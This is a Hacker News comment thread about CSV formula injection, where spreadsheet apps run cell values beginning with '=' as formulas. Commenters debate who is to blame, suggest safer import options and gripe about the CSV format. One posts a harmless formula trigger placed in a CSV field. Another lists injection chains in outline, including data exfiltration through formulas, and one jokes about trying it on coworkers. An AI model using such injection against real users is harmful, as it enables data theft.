
If we thought about it as an API mechanism, we would parse the strings and apply rules to sanitise or reject it.

mulmen8y ago

fulafel8y ago

I think the common model people had of CSV was that it was an imperfect way to transfer values, but safeish from code execution, XSS or "all your Google account data gets exfiltrated" type effects.

mulmen8y ago

The problem isn't with CSV, it is with spreadsheet applications.

2 more replies

jdelStrother8y ago

That's just a single regular apostrophe? At least on my machine, with Mac Excel 15.38, if I have a CSV containing:

1,foo,'=SUM(A1:A10),bar

and open it, then the single apostrophe is visible in the cell.

elliottcarlson8y ago

You should actually append it to the trigger; i.e.

1,foo,='SUM(A1:A10),bar

fulafel8y ago· 6 in thread

This is foremost a vulnerability in Excel and Google Sheets, like the article concludes, though it warrants workarounds in CSV producers.

Why would these apps go off executing code from a text file? How odd.

Is there a way to tell Excel or Sheets to open a CSV file without executing code?

sanotehu8y ago

yjftsjthsd-h8y ago

So why does it not import when opening files?

1 more reply

pbhjpbhj8y ago

So a safe-import could import all columns as text (without interpretation) and offer to parse columns with a predictive input type suggestion.

cm21878y ago

Agree it is completely absurd to allow formulas in a CSV file, let alone code.

matt_kantor8y ago

My first thought was this dead-simple solution: just pop up a prompt when opening CSVs. "Do you want to run formulas from this CSV file?" No need for complicated import wizards, just a simple yes/no.

pbhjpbhj8y ago

"Yes/no/always/always for all files (see settings>blah>foo to change this option" would seem more user friendly to me, or is that too many options?

1 more reply

bitexploder8y ago· 5 in thread

I have been finding this vulnerability in apps since I started in infosec 10 years ago. I have seen it go any number of ways:

CSV -> import on web app -> SQLi

Malicious input -> CSV download from web app -> Excel -> formula -> sneaky data exfil

CSV -> JS -> import into web app XSS (in places no other XSS existed because of the data)

CSV import -> weird CSV header -> arbitrary data loading (headers were column names.... Schema injection .. like SQLi only more hilarious

Point is apps and devs can have blind spots (knowledge gaps) or just not think of a CSV import or export like other functionality.

e1g8y ago

f00_8y ago

>defend against DDoS but not sanitizing user input

>calling a pentested a script kiddie

welp, my work is done here

1 more reply

captn3m08y ago

Were you generating CSVs or importing them?

1 more reply

IncRnd8y ago

"Input is evil" is a pretty good maxim to follow.

marcosdumay8y ago

Yet, nobody ever expects the CSV to be.

1 more reply

TAForObvReasons8y ago· 5 in thread

pmoriarty8y ago

There's nothing in CSV that has anything to do with presentation (nor with what the underlying values are, for that matter).

These vulnerabilities can't be blamed on CSV so much as on the desire of application vendors to treat data as code.

Dylan168078y ago

CSV is a format for two-dimensional text values, and nothing beyond that. It's not a poor format, it's a simple low-level format.

mulmen8y ago

Excel conflates the idea of display format and data type which is the source of countless headaches. It is legacy pain in the purest form.

mjevans8y ago

CSV was only ever intended to store simple text and simple numbers.

Dates are a /type/ of text; parsing dates in to machine readable formats is an /entire/ other can of spam.

cozzyd8y ago

It would be interesting if spreadsheets supported a sub-set of a binary interchange format like FITS or HDF5.

splike8y ago· 4 in thread

[1] https://genomebiology.biomedcentral.com/articles/10.1186/s13...

sixbrx8y ago

krylon8y ago

FWIW, I (not a biologist, though) only use LibreOffice for importing CSV these days. It allows me to look at the fields first and tell it if I want to suppress special treatment of data in a column.

EDIT: LibreOffice also allows you to tell it what encoding a file uses and what character(s) are used as separators.

xelxebar8y ago

splike8y ago

We'll cross that bridge when we come to it I guess, but we work almost exclusively with human and mouse genomes for now.

In any case, I imagine the Ensembl ID is still safer than other encodings in the case of invertebrates. For example, genes IDs in the Fruit fly genome look like FBgn0034730.

jkabrg8y ago· 4 in thread

Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV dialect with its own file extension. Or maybe just use SQLite tables or Parquet?

Some things I dislike about CSV:

* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

* No agreement about escape characters.

* No agreement about separator characters.

* No agreement about line endings.

* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?

* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".

These use up a bit of time whenever I get a CSV from a colleague, or even when I change operating system. Sometimes I end up clobbering the file itself.

Good things: * Human readable. * Simple.

I think the addition of some rules, and a standard interpretation of them, could go some way to improving the format.

kqr8y ago

(Hey, this reminds me of a similar situation governing s/CSV/C/g...)

johnwilkesbooth8y ago

> No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

f00_8y ago

.parquet fam, it's all about columnar data stores now

tomc19858y ago

XKCD covered this: https://xkcd.com/927/

top_post8y ago· 2 in thread

bitexploder8y ago

Well, it catches folks by surprise. We could abstract all computer vulns down to a few broad computing concepts, but that isn't as useful.

top_post8y ago

It kind of is more useful to abstract them, so we're not whack-a-moling the current hype or hot title of the day and can focus on the fundamental issues.

I agree, it catches people off guard to think CSV files once interpreted can do more than give columns of information, but it's not an injection which is my beef.

1 more reply

ComodoHacker8y ago· 2 in thread

My Excel 2010 doesn't execute shell code from author's example. Heck, it doesn't even parse CSV and loads everything into one column as text. What am I doing wrong?

randkyp8y ago

tyingq8y ago

It does depend on using the csv file extension. Anything else brings up the import wizard.

hutch1208y ago· 2 in thread

Little Bobby Tables reminds us to sanitize our database inputs.

https://imgs.xkcd.com/comics/exploits_of_a_mom.png

billpg8y ago

That's bad advice.

http://blog.hackensplat.com/2013/09/never-sanitize-your-inpu...

trishmapow28y ago

Expected something revolutionary, turned out to be an argument over semantics...

1 more reply

Swizec8y ago· 1 in thread

This brings XSS to a whole new level. Imagine what happens if you know some of what you post in a website as a user eventually gets reviewed by somebody who gets it through a CSV dump.

Makes me wanna troll ops people at my own startup just for funsies.

_betty_8y ago

beached_whale8y ago· 1 in thread

Excel protects for this, at least mine does v2013

Piskvorrr8y ago

As mentioned, protects by showing a wall of text with "yes" preselected at bottom; equally useless and annoying.

Cyranix8y ago

https://bugcrowd.com/socrata

Mortiffer8y ago

jaclaz8y ago

At least here (Italy) CSV is not commonly used (because of the different way we use the comma as a decimal point) and the default (in Excel) separator is then set to a semi-colon.

captn3m08y ago

On the first attack vector: Google Security has a nice post about it [0] and why they do not consider it a valid threat. This is their reasoning:

[0]: https://sites.google.com/site/bughunteruniversity/nonvuln/cs...

Their policy makes it sound like that the second vulnerability should indeed be fixed in Google Sheets itself (it is the one opening the file, after all)

jonnycomputer8y ago

filereaper8y ago

I'd be curious if anyone has hit exploits with CSV files and bulk ingestion into datawarehouses (eg Redshift, Greenplum, etc..) as opposed to Excel.

CSVs are still the most portable format for moving data around despite all of their evils of escaping characters, comma delimitation, etc...

A lot of old legacy systems know CSV and its easy to inspect visually as compares to more efficient binary formats like ORC or Paquet.

tatersolid8y ago

Use anything else, even XLSX which is at least a typed and openly standardized format.

stepri8y ago

ecesena8y ago

Does anybody know any good library that solve the problem, in any language?

jasonmaydie8y ago

Shouldn't this be the dangers of Excel? CSVs are benine

j / k navigate · click thread line to collapse